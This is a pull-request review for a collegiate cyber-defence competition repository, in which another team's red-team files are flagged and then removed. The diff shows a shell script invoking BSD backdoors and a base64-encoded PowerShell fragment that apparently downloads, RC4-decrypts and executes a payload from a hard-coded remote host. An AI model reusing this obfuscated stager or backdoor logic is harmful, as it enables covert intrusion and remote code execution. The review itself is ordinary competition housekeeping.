### PR TITLE
utulsa files

### PR DESCRIPTION
**Pull request by colonket**
Our windows and linux scripts.
I also included UCR's (a WRCCDC team) CCDC repo in this PR in case we're allowed to use it.

Thank you for helping run SWCCDC!

### CODE REVIEW

File: utulsa/ucr-ccdc/red-team/2017/lol.sh [hunk 1]
```diff
@@ -0,0 +1,246 @@
...
+
+# freebsd
+if [ `uname`  = 'FreeBSD' ]; then
+	do_bsdbackdoors
+  echo "Enjoy"
+  exit
+fi
+
+# If we are still here, we backdoor shit and run 32 bit client
+echo "Fuck it, just unload the horseshit..."
```
Comment (gb1035) [inline utulsa/ucr-ccdc/red-team/2017/lol.sh]: Please remove profanity.

File: utulsa/ucr-ccdc/blue-team/injects/UCR Toplogy Template.xml [hunk 2]
```diff
@@ -0,0 +1 @@
...B3DEKnQJ/rwWERwOTMvsiOM/HQpmzDafqS+FwP2/Z+Es1D1rsgsoOvQQ1iI9Atn0yVtEQfCxbQuZxrsmav8SY93cU04suQkWRBAvk7IhhgCd2053el1qoOrIeZ4iU9MbzEUBcdDgRzC5pzE2zOsXg5KF6Q6rPHWdBUHX3/TUaREGKjZAJyA1FvwSeUDCWxyUDxBAB86ARLNb5TNdcRiq1by4W/XeBi6Wo3lhKr60MIRDWt2ZSrA9vnNjjWWgNfnbKp1OoihgV1DF6YALokZPwdoJk67TyRdH9cmuCZfW6jFe2nSdrwYcxOIfRwaVhEKwTgKErp7Z590KVIIeqftlMrb+eMPJ2xgWPaoyxEgn6zPcHyPmE7X7PI+lNFWNDnJnqwbzwBS/aUcnHbuaC4wBCdTRRlmvZCl95eLAnnzycR7CXLjm+79C5rPran0dBauGEYc/TPBNavYqdy+IGKRXi9FNQQEhMPDM3HAQAHy3SyIzyhUR7llPWUDeIxgUqq02UMChEkclUYFV1pr7loRc60gfa8KqKa/HFinxwf5DMG/Fpiy6hp7wuDkADgDoVDFjGlyj7LTe/p4hntHfjSLPB+9cLlMjhtJgZec+ZAn+Oa0grnAXfVF/9eIB3nnFWmHa2EvoVVuJquiCRvYJ2ezgozZeGYU6yZBYnqnmowAbwm2Rj1tc8pE/5knKLBC7s+PXfw/j+0aH6PCWs7asL5PMcHyjI4S0++k9nGOFEgf3N+AUBlRIMIqgPNYJo19GGePeENPVcz1qwbPJRC+NNJuR6f48NhFKRHUqoeQfzAASello/pBotRGf2Ma8XDgU0bdKIo/4q8jHLOYzLfqtC/uxaJ/Pk9VS0b+PvlJ1OIOW/7aRh5J19dcWGgR+YNvpdLWsVEIMaacF2qe+bUGnWQeXP1lns4H7PCkDYHhaQ54EDHbL49R49kJ38AsP7GLrn/i20QoqDHTuRwzDQGQvo4sd6T+ZN/rIN9BjstmX6sTQTYCHZDVzx+UMQdosfOOSssCJ0HNuVbIHodyd2hStyCOpAkgOlS0C8b3T8gC3AIt/NdkkzmmMcNOpl+E5wWnsze46TOKb8kz/5kz/5kz/5kz/5kz/5k/9FGDCKA3z/v0yiQf7n2BH43wOb/tvYERj7P88deT7OAxgH858JTGD62GcA45BQ/r8A</diagram></mxfile>
```
Comment (gb1035) [inline utulsa/ucr-ccdc/blue-team/injects/UCR Toplogy Template.xml]: What is the base64 text?

File: utulsa/ucr-ccdc/red-team/2017/windows_partay.cmd [hunk 3]
```diff
@@ -0,0 +1,3 @@
...
...AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBOAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABXAEMALgBIAEUAYQBkAEUAUgBTAC4AQQBEAEQAKAAiAEgAbwBzAHQAIgAsACIAZABvAHcAZgA0AHIAcgAyADgAYQBqAHIAaQAuAGMAbABvAHUAZABmAHIAbwBuAHQALgBuAGUAdAAiACkAOwAkAFcAYwAuAEgARQBhAGQARQByAHMALgBBAEQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9ADEASAArAGQARgBIAHgASABoAFIAdABKAGoAagBEAC8AagB2ADkAWABiAEkAawBqAFYARwA4AD0AIgApADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwAxADcAOAAuADYAMgAuADEAOQA2AC4AMQA4ADcAOgA0ADQAMwAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABEAGEAVABhAD0AJABXAEMALgBEAE8AdwBOAGwATwBhAEQARABhAHQAQQAoACQAUwBFAFIAKwAkAHQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABhAD0AJABkAEEAdABhAFsANAAuAC4AJABEAGEAdABhAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkAbgBbAEMASABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
```
Comment (gb1035) [inline utulsa/ucr-ccdc/red-team/2017/windows_partay.cmd]: What is this base64 text?

**Review by gb1035 — CHANGES_REQUESTED** [review]
Changes are needed. These will need to be resolved by Wed the 16th before 1pm CT for use in the game.

**Comment by colonket** [comment]
Apologies, I meant to only include UCR's Blue Team repo.
I've removed their red-team folder and the XML Draw.io Diagram.

**Review by gb1035 — APPROVED** [review]

**Pull request merged**